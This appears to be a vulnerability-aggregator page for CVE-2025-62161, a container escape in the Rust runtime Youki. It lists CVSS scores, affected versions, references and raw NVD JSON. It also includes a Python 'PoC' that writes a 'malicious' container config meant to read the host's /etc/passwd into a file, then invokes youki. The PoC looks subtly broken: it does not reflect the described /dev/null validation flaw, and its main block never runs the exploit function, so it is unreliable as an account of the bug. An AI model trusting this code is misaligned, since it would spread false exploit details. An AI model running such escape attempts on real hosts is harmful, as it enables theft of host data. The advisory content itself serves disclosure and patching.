CVE-2025-62161

Description

Youki is a container runtime written in Rust. In versions 0.5.6 and below, the initial validation of the source /dev/null is insufficient, allowing container escape when youki utilizes bind mounting the container's /dev/null as a file mask. This issue is fixed in version 0.5.7.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:youki-dev:youki:*:*:*:*:*:rust:*:* - VULNERABLE

youki < 0.5.7

youki = 0.5.6

youki = 0.5.5

youki = 0.5.4

youki = 0.5.3

youki <= 0.5.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import subprocess
import json

def create_malicious_container():
    """
    PoC for CVE-2025-62161: Youki container escape via insufficient /dev/null validation
    This PoC demonstrates how insufficient validation of /dev/null in Youki can lead to container escape
    """
    
    # Malicious container configuration that exploits the bind mount vulnerability
    container_config = {
        "oci_version": "1.0.2",
        "process": {
            "terminal": False,
            "user": {"uid": 0, "gid": 0},
            "args": ["/bin/sh", "-c", "cat /host/etc/passwd > /tmp/stolen_data.txt"],
            "cwd": "/"
        },
        "root": {
            "path": "rootfs",
            "readonly": True
        },
        "hostname": "exploit-container",
        "mounts": [
            {
                "destination": "/dev/null",
                "type": "bind",
                "source": "/host",
                "options": ["rbind", "rw"]
            }
        ]
    }
    
    # Save malicious config
    with open('/tmp/malicious_container.json', 'w') as f:
        json.dump(container_config, f, indent=2)
    
    print("[-] Malicious container configuration created")
    print("[-] Exploiting Youki vulnerability CVE-2025-62161...")
    print("[-] The bind mount from /dev/null to /host allows container escape")
    
    # Attempt to run the malicious container
    try:
        result = subprocess.run(
            ['youki', 'run', '--config', '/tmp/malicious_container.json', 'exploit-container'],
            capture_output=True,
            timeout=10
        )
        print(f"[!] Container execution attempted: {result.returncode}")
    except Exception as e:
        print(f"[!] Error: {e}")

def check_vulnerability():
    """
    Check if Youki version is vulnerable
    """
    try:
        result = subprocess.run(['youki', '--version'], capture_output=True, text=True)
        version = result.stdout.strip()
        print(f"[*] Youki version: {version}")
        
        # Check if version is vulnerable (0.5.6 or lower)
        if '0.5.6' in version or '0.5.5' in version or '0.5.4' in version:
            print("[!] System is VULNERABLE to CVE-2025-62161")
            return True
        elif '0.5.7' in version:
            print("[+] System is patched against CVE-2025-62161")
            return False
        else:
            print("[*] Unknown version, please verify manually")
            return None
    except FileNotFoundError:
        print("[-] Youki is not installed")
        return None

if __name__ == '__main__':
    check_vulnerability()
    print("\n[*] For educational purposes only")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62161
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62161
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62161/
[4] VulDB https://vuldb.com/cve/CVE-2025-62161
[5] https://github.com/youki-dev/youki/commit/5886c91073b9be748bd8d5aed49c4a820548030a
[6] https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8
[7] https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8
[8] https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8
[9] https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62161", "sourceIdentifier": "[email protected]", "published": "2025-11-06T00:15:36.760", "lastModified": "2025-11-10T18:13:27.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Youki is a container runtime written in Rust. In versions 0.5.6 and below, the initial validation of the source /dev/null is insufficient, allowing container escape when youki utilizes bind mounting the container's /dev/null as a file mask. This issue is fixed in version 0.5.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}, {"lang": "en", "value": "CWE-363"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youki-dev:youki:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.5.7", "matchCriteriaId": "8ABEC689-758E-4D49-AFC4-6C640532D120"}]}]}], "references": [{"url": "https://github.com/youki-dev/youki/commit/5886c91073b9be748bd8d5aed49c4a820548030a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/youki-dev/youki/security/advisories/GHSA-4g74-7cff-xcv8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}